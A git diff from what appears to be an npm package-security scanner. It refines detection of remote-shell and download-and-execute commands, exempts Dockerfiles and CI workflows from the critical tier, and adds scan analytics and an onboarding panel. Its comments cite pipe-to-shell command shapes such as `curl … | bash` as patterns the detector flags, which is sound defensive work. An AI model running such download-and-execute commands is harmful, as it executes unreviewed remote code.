+    // `firstMatchingCodeLine`. Download-and-execute below keeps the ordinary
+    // matcher, because `curl … | bash` shipped as an instruction still tells
+    // someone to run it — but only outside build infrastructure (below).
     const remoteShell = matchCategory(
       ctx.patterns.remoteShell,
       sample,
       normalized,
       packedObfuscation,
+      false,
+      true,
     );
     const downloadExecute = matchCategory(
       SHELL_DOWNLOAD_EXECUTE_PATTERN_SET,
@@ -209,16 +224,26 @@ export function scriptFindings(ctx: RuleContext): Finding[] {
       credentialAccess.matched;
 
     // A shell command is only a capability if something in reach can run it.
-    // The patterns match a command *string*, and comments are not stripped
-    // before matching, so an SDK that documents its HTTP API the usual way
-    // (`// equivalent to: curl -X POST …`) would otherwise raise a high finding
-    // on prose. Requiring a spawn API in the same file, or a lifecycle hook
-    // pointing at it, keeps the dropper shape and drops the documentation.
-    // Download-and-execute is exempt: `curl … | bash` has no benign reading
-    // even in a comment, and a package that ships that line as an instruction
-    // is still telling someone to run it.
+    // Requiring a spawn API in the same file, or a lifecycle hook pointing at
+    // it, keeps the dropper shape; `remoteShell` is additionally comment-blind
+    // so an SDK documenting its HTTP API (`// equivalent to: curl -X POST …`)
+    // never reaches here on prose alone.
+    //
+    // Download-and-execute normally skips that requirement: `curl … | bash` has
+    // no benign reading, and a package shipping that line as an instruction is
+    // still telling someone to run it. Build infrastructure is the exception —
+    // a Dockerfile's `RUN curl … | bash` or a workflow's `- run: curl … | sh`
+    // runs on a CI runner at build time, never on a consumer's install, and
+    // every mainstream toolchain documents exactly that idiom. Withholding the
+    // exemption there leaves the ordinary executor requirement, which those
+    // files do not satisfy.
+    const buildInfrastructure = isBuildInfrastructurePath(file.path);
+    // Build infrastructure keeps neither the exemption nor the critical tier:
+    // the same `curl … | bash` that is a dropper in a lifecycle script is a
+    // documented bootstrap step in a Dockerfile.
+    const downloadExecuteCapability = downloadExecute.matched && !buildInfrastructure;
     const shellExecutable =
-      processExecution.matched || lifecycleScriptFile || downloadExecute.matched;
+      processExecution.matched || lifecycleScriptFile || downloadExecuteCapability;
     if (remoteShell.matched && shellExecutable) {
       findings.push(
         testScope(
@@ -227,13 +252,13 @@ export function scriptFindings(ctx: RuleContext): Finding[] {
           tag("codeRemoteShell", {
             // Download-and-execute has no benign reading; a bare shell tool
             // paired with a spawn API does, so it sits one step below.
-            severity: downloadExecute.matched ? "critical" : "high",
+            severity: downloadExecuteCapability ? "critical" : "high",
             file: file.path,
-            line: downloadExecute.matched ? downloadExecute.line : remoteShell.line,
-            evidence: downloadExecute.matched
+            line: downloadExecuteCapability ? downloadExecute.line : remoteShell.line,
+            evidence: downloadExecuteCapability
               ? `${prefix}shell command downloads and executes remote code`
               : `${prefix}shell command with network or inline-interpreter capability`,
-            reason: downloadExecute.matched
+            reason: downloadExecuteCapability
               ? "the command fetches code over the network and pipes it straight into an interpreter, so the package runs bytes it never shipped and no reviewer can see"
               : "shell commands reach the network and re-enter an interpreter outside the language-level APIs the other capability rules model, so this executes code the package did not ship",
             ...(remoteShell.obfuscated ? { obfuscated: true } : {}),
@@ -340,8 +365,13 @@ function matchCategory(
   normalized: string,
   sourceObfuscated = false,
   matchAcrossLines = false,
+  codeLinesOnly = false,
 ): { matched: boolean; line: number | undefined; obfuscated: boolean } {
-  const findLine = matchAcrossLines ? firstMatchingSourceLine : firstMatchingLine;
+  const findLine = codeLinesOnly
+    ? firstMatchingCodeLine
+    : matchAcrossLines
+      ? firstMatchingSourceLine
+      : firstMatchingLine;
   const line = findLine(sample, patterns);
   if (line !== undefined) return { matched: true, line, obfuscated: sourceObfuscated };
   if (normalized !== sample) {

--- a/server/lib/scan/job.ts
+++ b/server/lib/scan/job.ts
@@ -146,6 +146,17 @@ export async function executeScanJob(
           durationMs: durationMsSince(startedAtMs),
           error: safe,
         });
+        // Terminal counterpart to this scan's `scan.queued`, so a discovered
+        // candidate that npm withdrew before we could review it does not read
+        // as a scan that queued and vanished.
+        recordProductEvent(env, {
+          name: "scan.discarded",
+          organizationId: message.organizationId,
+          ecosystem: "npm",
+          source: message.source ?? "auto_discovery",
+          reason: "staged_tarball_unavailable",
+          durationMs: durationMsSince(startedAtMs),
+        });
       } else {
         await markScanFailed(db, message.scanId, message.organizationId, safe);
         // Counted only on a terminal failure, so a scan that succeeds on retry

--- a/server/lib/scan/job.ts
+++ b/server/lib/scan/job.ts
@@ -17,6 +17,7 @@ import {
 import { runScanPipeline } from "./pipeline";
 import { sandboxErrorDetail } from "../sandbox";
 import type { ScanInput } from "../../types";
+import { recordProductEvent } from "../platform/analytics";
 
 export interface ScanQueueMessage extends ScanInput {
   scanId: string;
@@ -101,6 +102,7 @@ export async function executeScanJob(
         stageId: message.stageId,
         maxFiles: message.maxFiles,
         organizationId: message.organizationId,
+        source: message.source ?? "manual",
       },
     );
     emitOperationalEvent("info", "scan.job.completed", {
@@ -146,6 +148,16 @@ export async function executeScanJob(
         });
       } else {
         await markScanFailed(db, message.scanId, message.organizationId, safe);
+        // Counted only on a terminal failure, so a scan that succeeds on retry
+        // is not filed as a failure in the aggregate.
+        recordProductEvent(env, {
+          name: "scan.failed",
+          organizationId: message.organizationId,
+          ecosystem: "npm",
+          source: message.source ?? "manual",
+          code: safe.code,
+          durationMs: durationMsSince(startedAtMs),
+        });
         emitOperationalEvent("error", "scan.job.failed", {
           scanId: message.scanId,
           organizationId: message.organizationId,

--- a/server/lib/scan/pipeline-phases.ts
+++ b/server/lib/scan/pipeline-phases.ts
@@ -162,8 +162,9 @@ export function scoreRisk(
   annotatedFindings: Array<Finding & FindingDiffAnnotation>,
   aiFindings: AiReview,
   releaseConsistency?: ReleaseConsistency | null,
+  options: { baselineComparisonSkipped?: boolean } = {},
 ): ScanRiskBreakdown {
-  return computeScanRiskBreakdown(annotatedFindings, aiFindings, releaseConsistency);
+  return computeScanRiskBreakdown(annotatedFindings, aiFindings, releaseConsistency, options);
 }
 
 export interface MergedAiFindings {

--- a/server/lib/scan/pipeline-phases.ts
+++ b/server/lib/scan/pipeline-phases.ts
@@ -15,6 +15,7 @@ import {
   durationMsSince,
   emitOperationalEvent,
 } from "../platform/observability";
+import { recordProductEvent } from "../platform/analytics";
 import {
   computeReleaseConsistency,
   noneReleaseConsistency,
@@ -154,12 +155,15 @@ export function runDeterministicFindings<TInput, TBroker extends AdapterBroker>(
 }
 
 // Pure: fold deterministic + AI findings into the artifact/release/context
-// risk breakdown.
+// risk breakdown. `releaseConsistency` only ever removes previously-approved
+// package context from the artifact/context scores; release-delta findings are
+// scored in full regardless, so it cannot move `releaseRisk`.
 export function scoreRisk(
   annotatedFindings: Array<Finding & FindingDiffAnnotation>,
   aiFindings: AiReview,
+  releaseConsistency?: ReleaseConsistency | null,
 ): ScanRiskBreakdown {
-  return computeScanRiskBreakdown(annotatedFindings, aiFindings);
+  return computeScanRiskBreakdown(annotatedFindings, aiFindings, releaseConsistency);
 }
 
 export interface MergedAiFindings {
@@ -207,9 +211,11 @@ export interface ResolveReleaseConsistencyArgs {
 
 // Side-effecting (db read): release memory. Compare the current deterministic
 // finding profile against the most recent completed scan of the same package,
-// in the same organization, that a maintainer decided "publish". Advisory only:
-// the outcome never feeds risk, the risk breakdown, or any finding — and a
-// lookup failure degrades to "none" instead of failing the scan.
+// in the same organization, that a maintainer decided "publish". The outcome
+// never edits a finding; its only scoring effect is that already-approved
+// package context stops anchoring the headline risk (see `scoreRisk` and
+// docs/release-memory.md). A lookup failure degrades to "none", which scores
+// exactly as it did before release memory existed, instead of failing the scan.
 export async function resolveReleaseConsistency(
   args: ResolveReleaseConsistencyArgs,
 ): Promise<ReleaseConsistency> {
@@ -389,9 +395,14 @@ export interface RecordCompletionArgs {
   baseline: BaselineInfo;
   persisted: boolean;
   pipelineStartedAtMs: number;
+  env?: Cloudflare.Env;
+  source?: string;
 }
 
-// Side-effecting: emit the structured completion observability event.
+// Side-effecting: emit the structured completion observability event plus the
+// aggregate product counter. The log line is for debugging one scan; the
+// counter is what still answers "how many, how fast, how risky" a month later,
+// after the log has aged out.
 export async function recordCompletion(args: RecordCompletionArgs): Promise<void> {
   const { result, identity } = args;
   const riskSummary = result.riskSummary;
@@ -402,13 +413,27 @@ export async function recordCompletion(args: RecordCompletionArgs): Promise<void
   // operator can see how many were advisory.
   const ruleFindingCount = result.ruleFindings.length;
   const aiFindingCount = projectAiReviewFindings(result.aiFindings).length;
+  const durationMs = durationMsSince(args.pipelineStartedAtMs);
+
+  recordProductEvent(args.env, {
+    name: "scan.completed",
+    organizationId: identity.organizationId,
+    ecosystem: args.adapterId,
+    source: args.source ?? "unknown",
+    releaseRisk: riskSummary.releaseRisk,
+    artifactRisk: risk,
+    contextRisk: riskSummary.contextRisk,
+    durationMs,
+    ruleFindingCount,
+    aiFindingCount,
+  });
 
   emitOperationalEvent("info", "scan.pipeline.completed", {
     scanId: identity.scanId,
     organizationId: identity.organizationId,
     stageId: identity.stageId,
     adapterId: args.adapterId,
-    durationMs: durationMsSince(args.pipelineStartedAtMs),
+    durationMs,
     packageName: result.package.name,
     releaseRisk: riskSummary.releaseRisk,
     artifactRisk: risk,

--- a/server/lib/scan/pipeline.ts
+++ b/server/lib/scan/pipeline.ts
@@ -104,6 +104,7 @@ export async function runScanPipeline<TInput, TBroker extends AdapterBroker>(
       [...findings.annotatedFindings, ...mergedAiFindings.annotatedRecords],
       aiFindings,
       releaseConsistency,
+      { baselineComparisonSkipped: Boolean(resolved.baseline.baseline.comparisonSkipped) },
     );
 
     const { result, persisted } = await persistResults({

--- a/server/lib/scan/pipeline.ts
+++ b/server/lib/scan/pipeline.ts
@@ -11,6 +11,7 @@ import {
   durationMsSince,
   emitOperationalEvent,
 } from "../platform/observability";
+import { recordProductEvent } from "../platform/analytics";
 import {
   computeDiff,
   mergeAiFindings,
@@ -29,6 +30,8 @@ import type { ScanInput, ScanResult } from "../../types";
 export interface ScanPipelineOptions extends ScanInput {
   scanId?: string;
   organizationId: string;
+  /** `manual` | `auto_discovery` | `workflow_gate`; recorded on the product counter. */
+  source?: string;
   // Adapters parse their own input shape off this object (e.g. the PyPI adapter
   // reads `manifest`/`artifacts`), so allow extra keys to flow through untyped.
   [key: string]: unknown;
@@ -82,14 +85,13 @@ export async function runScanPipeline<TInput, TBroker extends AdapterBroker>(
       adapter.codePatternSet,
       Boolean(resolved.baseline.baseline.comparisonSkipped),
     );
-    const riskSummary = scoreRisk(
-      [...findings.annotatedFindings, ...mergedAiFindings.annotatedRecords],
-      aiFindings,
-    );
 
-    // Advisory release-memory lookup (db read) before persistence. It compares
-    // finding profiles only; it never touches risk or findings, and a lookup
-    // failure degrades to "none" inside the phase instead of failing the scan.
+    // Release-memory lookup (db read) before scoring. It compares finding
+    // profiles only and never edits a finding; its one scoring effect is to stop
+    // already-approved *package context* from re-anchoring the headline risk.
+    // Release-delta findings are untouched, so `releaseRisk` — and the workflow
+    // gate that reads it — cannot move. A lookup failure degrades to "none"
+    // inside the phase, which scores exactly as before.
     const releaseConsistency = await resolveReleaseConsistency({
       db,
       env,
@@ -97,6 +99,12 @@ export async function runScanPipeline<TInput, TBroker extends AdapterBroker>(
       packageName: findings.redactedStagedManifest?.name ?? null,
       ruleFindings: findings.ruleFindings,
     });
+
+    const riskSummary = scoreRisk(
+      [...findings.annotatedFindings, ...mergedAiFindings.annotatedRecords],
+      aiFindings,
+      releaseConsistency,
+    );
 
     const { result, persisted } = await persistResults({
       env,
@@ -123,6 +131,8 @@ export async function runScanPipeline<TInput, TBroker extends AdapterBroker>(
       baseline: resolved.baseline.baseline,
       persisted,
       pipelineStartedAtMs,
+      env,
+      source: input.source,
     });
 
     return result;
@@ -194,6 +204,19 @@ async function maybeRunAiReview(args: AiReviewArgs): Promise<AiReview> {
       ruleFindings: args.findings.releaseRuleFindings,
       previousVersionAvailable: args.previousVersionAvailable,
     });
+    // A review that returns `invalid`/`unavailable` is handled safely — the
+    // scan floors at medium and `displayedAiResult` refuses to render it as
+    // "low risk / nothing unusual" — but it is silent. Counting the status makes
+    // the reviewer's failure rate a number instead of a thing nobody sees.
+    recordProductEvent(args.env, {
+      name: "ai_review.finished",
+      organizationId: args.identity.organizationId,
+      ecosystem: args.ecosystem,
+      status: review.status,
+      model: review.model ?? "unknown",
+      durationMs: durationMsSince(startedAtMs),
+      findingCount: review.findings.length,
+    });
     emitOperationalEvent("info", "scan.ai_review.completed", {
       scanId: args.identity.scanId,
       organizationId: args.identity.organizationId,
@@ -215,6 +238,15 @@ async function maybeRunAiReview(args: AiReviewArgs): Promise<AiReview> {
     });
     return review;
   } catch (err) {
+    recordProductEvent(args.env, {
+      name: "ai_review.finished",
+      organizationId: args.identity.organizationId,
+      ecosystem: args.ecosystem,
+      status: "errored",
+      model: AI_MODEL,
+      durationMs: durationMsSince(startedAtMs),
+      findingCount: 0,
+    });
     emitOperationalEvent("error", "scan.ai_review.failed", {
       scanId: args.identity.scanId,
       organizationId: args.identity.organizationId,

--- a/server/lib/scan/release-memory.ts
+++ b/server/lib/scan/release-memory.ts
@@ -5,8 +5,12 @@
 // scan says so instead of presenting the same capability findings as if they
 // were novel (test runners legitimately spawn processes on every release).
 //
-// This signal is display-only context. It never modifies `risk`, the risk
-// breakdown, or any finding — deterministic findings stay authoritative.
+// Findings are never edited, hidden, or re-severitied here — deterministic
+// findings stay authoritative. The one scoring effect lives in `risk.ts`:
+// package-context findings already present in the approved profile stop
+// anchoring the headline risk. Release-delta findings are excluded from that
+// adjustment, so `releaseRisk` (and the workflow gate reading it) cannot move.
+// See docs/release-memory.md.
 
 type ReleaseConsistencyStatus = "match" | "subset" | "diverged" | "none";
 

--- a/server/lib/workflow-gate-job.ts
+++ b/server/lib/workflow-gate-job.ts
@@ -25,6 +25,7 @@ import {
   durationMsSince,
   emitOperationalEvent,
 } from "./platform/observability";
+import { recordProductEvent } from "./platform/analytics";
 import {
   type PreparedGatePackage,
   type PreparedGateRelease,
@@ -457,7 +458,10 @@ async function reviewGatePackages(
       const result = await runScanPipeline(
         { env, executionCtx, db, session: { userId: ownerUserId } },
         packageAdapter,
-        { scanId, stageId, organizationId, ...candidate.pipelineInput },
+        // `source` matches the `workflow_gate` value the D1 row already
+        // carries; without it the product counter files every gated scan as
+        // "unknown" and the npm/gate split is unreadable.
+        { scanId, stageId, organizationId, source: "workflow_gate", ...candidate.pipelineInput },
       );
       return {
         scanId,
@@ -467,7 +471,20 @@ async function reviewGatePackages(
         baselineComparisonSkipped: Boolean(result.baseline.comparisonSkipped),
       };
     } catch (err) {
-      await markScanFailed(db, scanId, organizationId, classifyScanError(err));
+      const safe = classifyScanError(err);
+      await markScanFailed(db, scanId, organizationId, safe);
+      // `scan.failed` otherwise only fires on the npm queue path, so gated
+      // failures went uncounted while gated *completions* were counted — which
+      // biases the derived failure rate low for exactly the ecosystems that
+      // only release through a gate.
+      recordProductEvent(env, {
+        name: "scan.failed",
+        organizationId,
+        ecosystem: packageAdapter.id,
+        source: "workflow_gate",
+        code: safe.code,
+        durationMs: 0,
+      });
       throw err;
     }
   });

--- a/server/lib/workflow-gate-job.ts
+++ b/server/lib/workflow-gate-job.ts
@@ -453,6 +453,15 @@ async function reviewGatePackages(
       packageName: candidate.package.name,
       stagedVersion: candidate.package.version,
     });
+    // Counted per package scan, not per gate: a monorepo bundle creates several
+    // scans under one gate and each emits its own `scan.completed`, so counting
+    // the gate would make the queued -> completed drop-off unreadable.
+    recordProductEvent(env, {
+      name: "scan.queued",
+      organizationId,
+      ecosystem: candidate.ecosystem,
+      source: "workflow_gate",
+    });
 
     try {
       const result = await runScanPipeline(

--- a/server/routes/github-app.ts
+++ b/server/routes/github-app.ts
@@ -576,6 +576,7 @@ githubAppRoutes.post("/workflow-gates/:gateId/decision", async (c) => {
       reason: comment || null,
     },
     scanArtifactReadBucket(c.env),
+    c.env,
   );
   if (!decidedPackage) {
     const current = await getGateForOrganization(db, organizationId, gateId);

--- a/server/routes/npm-connection.ts
+++ b/server/routes/npm-connection.ts
@@ -13,6 +13,7 @@ import {
   requireActiveOrganizationContext,
 } from "../lib/auth/active-organization";
 import { roleCanManageIntegrations } from "../lib/auth/roles";
+import { recordProductEvent } from "../lib/platform/analytics";
 import {
   allowInsecureLocalRegistry,
   decryptNpmToken,
@@ -147,6 +148,14 @@ npmConnectionRoutes.post("/validate", async (c) => {
         },
       }),
     ]);
+    // The onboarding funnel's one measurable step inside the product: getting a
+    // token validated is the last thing a new organization does before its
+    // first review depends on an external staged publish.
+    recordProductEvent(c.env, {
+      name: "npm_connection.validated",
+      organizationId,
+      outcome: validation.ok ? "ok" : "failed",
+    });
 
     return c.json({ validation, connection: publicNpmConnection(updated) });
   } catch (err) {

--- a/server/routes/public-diff.ts
+++ b/server/routes/public-diff.ts
@@ -4,6 +4,7 @@ import { enforceRateLimit, RateLimitError } from "../db/rate-limit";
 import { getPublicDiffAdapter } from "../lib/ecosystems";
 import { PUBLIC_NPM_REGISTRY } from "../lib/ecosystems/npm/public-diff";
 import { rateLimitResponse } from "../lib/platform/http";
+import { recordProductEvent } from "../lib/platform/analytics";
 import {
   computePublicDiffCacheKey,
   loadPublicPackageDiff,
@@ -111,7 +112,11 @@ function publicDiffErrorResponse(c: PublicDiffContext, err: unknown): Response {
 
 async function loadRequestedDiff(
   c: PublicDiffContext,
-  options: { limitColdComputation?: boolean } = {},
+  // `countView` is off for the `/file` route. Both routes funnel through here,
+  // and `/file` is called once per file the visitor opens — counting it would
+  // report one page view as thirty, and skew the cache column toward `hit`
+  // because only the first request can miss.
+  options: { limitColdComputation?: boolean; countView?: boolean } = {},
 ): Promise<{ payload: PublicPackageDiff } | { error: Response }> {
   const adapter = requestedEcosystem(c);
   if (adapter instanceof Response) return { error: adapter };
@@ -133,21 +138,51 @@ async function loadRequestedDiff(
     registryUrl: adapter.registryUrl,
   };
 
+  const startedAtMs = Date.now();
+  let cacheHit: boolean | null = null;
   try {
     if (options.limitColdComputation) {
       const cacheKey = await computePublicDiffCacheKey(input);
       const cached = await readPublicDiffCache(c.env, cacheKey);
-      if (cached) return { payload: cached };
+      if (cached) {
+        if (options.countView) recordPublicDiffView(c, cached, true, startedAtMs);
+        return { payload: cached };
+      }
 
       const limited = await enforcePublicRateLimit(c, "fetch", 10);
       if (limited) return { error: limited };
     }
 
-    const payload = await loadPublicPackageDiff(c.env, c.executionCtx, input);
+    const payload = await loadPublicPackageDiff(c.env, c.executionCtx, input, {
+      onCacheOutcome: (hit) => {
+        cacheHit = hit;
+      },
+    });
+    if (options.countView) recordPublicDiffView(c, payload, cacheHit, startedAtMs);
     return { payload };
   } catch (err) {
     return { error: publicDiffErrorResponse(c, err) };
   }
+}
+
+// The growth loop's only measurement. Anonymous by construction: the package
+// name is already public in the request URL, the cache key, and the page's own
+// Open Graph metadata, and nothing about the visitor is recorded — no IP, no
+// user agent, no session, no cookie. See server/lib/platform/analytics.ts.
+function recordPublicDiffView(
+  c: PublicDiffContext,
+  payload: PublicPackageDiff,
+  cacheHit: boolean | null,
+  startedAtMs: number,
+): void {
+  recordProductEvent(c.env, {
+    name: "public_diff.viewed",
+    ecosystem: payload.ecosystem,
+    packageName: payload.packageName,
+    cache: cacheHit === null ? "unknown" : cacheHit ? "hit" : "miss",
+    risk: payload.risk?.artifactRisk ?? "unknown",
+    durationMs: Math.max(0, Date.now() - startedAtMs),
+  });
 }
 
 publicDiffRoutes.get("/versions", async (c) => {
@@ -203,7 +238,8 @@ function publicDiffCacheTag(ecosystem: string, packageName: string): string {
 publicDiffRoutes.get("/", async (c) => {
   const limited = await enforcePublicRateLimit(c, "fetch", 10);
   if (limited) return limited;
-  const loaded = await loadRequestedDiff(c);
+  // The version-pair route is the page view; `/file` below is not.
+  const loaded = await loadRequestedDiff(c, { countView: true });
   if ("error" in loaded) return loaded.error;
   const { payload } = loaded;
 

--- a/server/routes/scans.ts
+++ b/server/routes/scans.ts
@@ -56,6 +56,7 @@ import {
   checkStagedPublishAccess,
   fetchStagedPublishDetails,
 } from "../lib/ecosystems/npm/staged-publishes";
+import { recordProductEvent } from "../lib/platform/analytics";
 import type { Bindings, ScanInput, Variables } from "../types";
 
 export const scansRoutes = new Hono<{ Bindings: Bindings; Variables: Variables }>();
@@ -128,6 +129,16 @@ scansRoutes.post("/", async (c) => {
       organizationId,
       actorUserId: session.userId,
     };
+
+    // Counted at creation, not completion, so the queued → completed drop-off
+    // is visible: a scan that never reaches a terminal state emits neither
+    // `scan.completed` nor `scan.failed` and would otherwise vanish.
+    recordProductEvent(c.env, {
+      name: "scan.queued",
+      organizationId,
+      ecosystem: "npm",
+      source: message.source ?? "manual",
+    });
 
     if (c.env.SCAN_QUEUE) {
       await c.env.SCAN_QUEUE.send(message);
@@ -258,6 +269,7 @@ scansRoutes.post("/:id/decision", async (c) => {
       reason,
     },
     scanArtifactReadBucket(c.env),
+    c.env,
   );
 
   if (!updated) {

--- a/src/models/scan.ts
+++ b/src/models/scan.ts
@@ -52,6 +52,8 @@ interface ScanRiskSummary {
   releaseFindingCount: number;
   contextFindingCount: number;
   unknownFindingCount: number;
+  /** Optional: absent on scans persisted before release memory affected scoring. */
+  priorApprovedContextFindingCount?: number;
 }
 
 export interface ScanListItem {
@@ -219,6 +221,12 @@ export const ScanListModel = createModel(() => {
   const decisionError = signal<string | null>(null);
   const deleteStatus = signal<DeleteStatus>("idle");
   const deleteError = signal<string | null>(null);
+  // Whether this organization has ever had a scan, independent of the active
+  // filter. `null` means not yet determined. The list alone cannot answer this:
+  // the default filter is "undecided", so a maintainer who has decided every
+  // review looks identical to one who has never run a scan — and only the
+  // second should be shown the getting-started panel.
+  const hasAnyScan = signal<boolean | null>(null);
 
   async function refresh(): Promise<void> {
     const currentFilter = filter.peek();
@@ -228,11 +236,39 @@ export const ScanListModel = createModel(() => {
       scans.value = data.scans;
       nextCursor.value = data.nextCursor;
       error.value = null;
+      // Resolved on every refresh rather than latched once, because `refresh`
+      // is also what runs on an organization switch: a stale `true` carried
+      // over from the previous organization would hide the getting-started
+      // panel from a brand-new one.
+      if (data.scans.length > 0) {
+        // Any non-empty page settles it without another request.
+        hasAnyScan.value = true;
+      } else if (currentFilter === "all") {
+        // An empty "all" page is the direct answer.
+        hasAnyScan.value = false;
+      } else {
+        hasAnyScan.value = null;
+        await resolveHasAnyScan();
+      }
     } catch (err) {
       error.value = errorMessage(err);
     } finally {
       loaded.value = true;
       refreshing.value = false;
+    }
+  }
+
+  // One-row probe for the case the filtered list cannot answer: this filter is
+  // empty, but the organization may still have decided reviews. Failure leaves
+  // `hasAnyScan` null, which renders nothing — an onboarding panel is never
+  // worth showing on a guess.
+  async function resolveHasAnyScan(): Promise<void> {
+    if (hasAnyScan.peek() !== null) return;
+    try {
+      const data = await listScans({ filter: "all", limit: 1 });
+      hasAnyScan.value = data.scans.length > 0;
+    } catch {
+      // Leave unknown.
     }
   }
 
@@ -257,6 +293,7 @@ export const ScanListModel = createModel(() => {
     decisionError,
     deleteStatus,
     deleteError,
+    hasAnyScan,
     refresh,
 
     async loadMore(): Promise<void> {
@@ -305,6 +342,15 @@ export const ScanListModel = createModel(() => {
       try {
         await deleteScan(id);
         this.scans.value = this.scans.value.filter((scan) => scan.id !== id);
+        // Deleting the organization's only scan puts it back in the
+        // never-scanned state, so the getting-started panel has to come back.
+        // An emptied list is not enough on its own — the active filter may just
+        // have nothing in it — so re-probe instead of assuming. One row, and it
+        // leaves the list alone.
+        if (this.scans.value.length === 0) {
+          this.hasAnyScan.value = null;
+          await resolveHasAnyScan();
+        }
         this.deleteStatus.value = "idle";
         return true;
       } catch (err) {

--- a/src/pages/Dashboard/GettingStarted.tsx
+++ b/src/pages/Dashboard/GettingStarted.tsx
@@ -1,0 +1,105 @@
+import { Card } from "../../components/Card";
+import { LinkButton } from "../../components/Button";
+import { Badge } from "../../components/Badge";
+import { Muted, SectionLabel } from "../../components/Typography";
+
+// Shown only to an organization that has never had a scan.
+//
+// Getting to first value needs an external event — a staged publish, or a gated
+// CI run — so the gap between "npm connected" and "first review" used to be
+// unguided: the dashboard offered a disabled "Check npm" button, never linked to
+// the docs, and the `npm stage publish` instruction lived only on /docs. This
+// panel closes that gap and, for the wait in between, points at /diff, which
+// runs the same deterministic rules over any published package with no setup at
+// all — the fastest honest way to see what a review looks like on your own code.
+export function GettingStarted({ npmConnected }: { npmConnected: boolean }) {
+  return (
+    <Card as="section" class="p-5 flex flex-col gap-4">
+      <div class="flex flex-col gap-1.5">
+        <SectionLabel as="h2">Get your first review</SectionLabel>
+        <Muted class="text-[13px] m-0">
+          Drydock reviews a release while it is still private, so the first review starts when you
+          stage one.
+        </Muted>
+      </div>
+
+      <ol class="list-none p-0 m-0 flex flex-col gap-3">
+        <Step index={1} title="Connect npm" done={npmConnected}>
+          {npmConnected ? (
+            <>A read-only token is stored for this organization.</>
+          ) : (
+            <>
+              Store a read-only npm token so Drydock can fetch staged tarballs.{" "}
+              <a href="/dashboard/settings?tab=integrations" class="underline">
+                Open settings
+              </a>
+              .
+            </>
+          )}
+        </Step>
+        <Step index={2} title="Stage a release">
+          Run <Code>npm stage publish</Code> from your package directory. npm holds the candidate
+          privately until you approve it. Drydock finds it automatically, or use{" "}
+          <strong class="font-medium text-ink">Check npm</strong> below.
+        </Step>
+        <Step index={3} title="Review and decide">
+          Read the diff, then approve the publish in npm with your own 2FA. Drydock never publishes.
+        </Step>
+      </ol>
+
+      <div class="flex flex-col gap-2 border-t border-border pt-4">
+        <Muted class="text-[13px] m-0">
+          Not ready to stage one? Run the same deterministic rules over any published version pair —
+          no token, no setup.
+        </Muted>
+        <div class="flex flex-wrap gap-2">
+          <LinkButton variant="primary" size="sm" href="/diff">
+            Diff a published package
+          </LinkButton>
+          <LinkButton variant="secondary" size="sm" href="/docs">
+            Read the docs
+          </LinkButton>
+          <LinkButton variant="ghost" size="sm" href="/docs#gate-setup">
+            Set up a CI workflow gate
+          </LinkButton>
+        </div>
+      </div>
+    </Card>
+  );
+}
+
+function Step({
+  index,
+  title,
+  done,
+  children,
+}: {
+  index: number;
+  title: string;
+  done?: boolean;
+  children: preact.ComponentChildren;
+}) {
+  return (
+    <li class="grid grid-cols-[1.5rem_minmax(0,1fr)] gap-x-3">
+      <span
+        aria-hidden
+        class={`font-mono text-[11px] font-medium tabular-nums leading-none pt-[3px] ${
+          done ? "text-ok-text" : "text-ink-subtle"
+        }`}
+      >
+        {done ? "✓" : String(index).padStart(2, "0")}
+      </span>
+      <div class="flex flex-col gap-1 min-w-0">
+        <div class="flex flex-wrap items-center gap-2">
+          <h3 class="text-[14px] font-medium tracking-[-0.005em] m-0">{title}</h3>
+          {done ? <Badge tone="ok">done</Badge> : null}
+        </div>
+        <p class="m-0 text-[13px] text-ink-muted leading-[1.6]">{children}</p>
+      </div>
+    </li>
+  );
+}
+
+function Code({ children }: { children: preact.ComponentChildren }) {
+  return <code class="font-mono text-[12px] text-ink">{children}</code>;
+}

--- a/src/pages/Dashboard/ScanDetail/ReleaseConsistencyNotice.tsx
+++ b/src/pages/Dashboard/ScanDetail/ReleaseConsistencyNotice.tsx
@@ -5,12 +5,19 @@ import {
 import { formatDateTime, pluralize } from "../../../lib/format";
 import { Alert } from "../../../components/Alert";
 
-// Advisory release-memory notice, rendered directly under the Recommendation.
+// Release-memory notice, rendered directly under the Recommendation.
 // match/subset: a prominent positive banner — the maintainer already reviewed
 // and published a release with this exact finding profile, so the same
 // capability findings are not news. diverged: a quiet one-liner pointing at the
-// count of genuinely new findings. It never changes risk and renders nothing
-// when there is no approved prior scan (or the scan predates the field).
+// count of genuinely new findings. Renders nothing when there is no approved
+// prior scan (or the scan predates the field).
+//
+// Release memory also removes already-approved *package context* from the
+// artifact risk (`priorApprovedContextFindingCount` in the risk breakdown).
+// `approvedContextCount` lets the banner say so, because a headline that
+// silently drops from high to low is worse than one that never moved. It never
+// touches release-delta findings, so the release risk the workflow gate reads
+// is unaffected.
 //
 // An empty profile (zero deterministic findings) gets its own wording instead
 // of "finding profile matches": a vacuous match must not read as reassurance
@@ -26,11 +33,27 @@ export function releaseConsistencyVariant(
   return consistency.currentFindingCount === 0 ? "empty" : consistency.status;
 }
 
-export function ReleaseConsistencyNotice({ value }: { value: unknown }) {
+export function ReleaseConsistencyNotice({
+  value,
+  approvedContextCount = 0,
+}: {
+  value: unknown;
+  approvedContextCount?: number;
+}) {
   const consistency = normalizeReleaseConsistency(value);
   if (!consistency) return null;
   const variant = releaseConsistencyVariant(consistency);
   if (!variant) return null;
+  const scoringNote =
+    approvedContextCount > 0 ? (
+      <>
+        {" "}
+        {approvedContextCount} package-context {pluralize("finding", approvedContextCount)}{" "}
+        {approvedContextCount === 1 ? "is" : "are"} listed below but no longer{" "}
+        {approvedContextCount === 1 ? "raises" : "raise"} this release&rsquo;s risk. Findings on
+        changed files always do.
+      </>
+    ) : null;
 
   if (variant === "diverged") {
     const count = consistency.newFindingCount;
@@ -41,7 +64,7 @@ export function ReleaseConsistencyNotice({ value }: { value: unknown }) {
         {consistency.priorVersion || consistency.priorScanId ? (
           <> ({priorScanLink(consistency)})</>
         ) : null}
-        .
+        .{scoringNote}
       </p>
     );
   }
@@ -81,6 +104,7 @@ export function ReleaseConsistencyNotice({ value }: { value: unknown }) {
           {approvedOn}. Every current finding was already reviewed and published.
         </>
       )}
+      {scoringNote}
     </Alert>
   );
 }

--- a/src/pages/Dashboard/ScanDetail/ReleaseRecommendation.tsx
+++ b/src/pages/Dashboard/ScanDetail/ReleaseRecommendation.tsx
@@ -67,8 +67,8 @@ export function ReleaseRecommendation({
   // The recommendation is the report's verdict, so it gets the only elevated
   // (carded) section among the supplementary bare sections below it, plus a
   // headline-scale verdict in the matching severity text color. Elevation +
-  // scale make it out-rank Risk signals / Manifest / Reviewer notes, which all
